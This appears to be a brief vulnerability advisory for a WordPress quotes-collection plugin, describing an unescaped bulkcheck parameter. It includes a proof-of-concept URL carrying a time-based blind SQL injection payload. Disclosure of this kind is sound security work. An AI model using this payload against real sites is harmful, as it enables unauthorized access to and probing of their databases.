The plugin does not validate and escape the bulkcheck parameter before using it in a SQL statement, leading to a SQL injection
https://example.com/wp-admin/admin.php?page=quotes-collection&s=&_wpnonce=6e21e0a8b6&action=make_public&paged=1&bulkcheck[]=1%20and%20sleep(10))--%20-&action2=make_public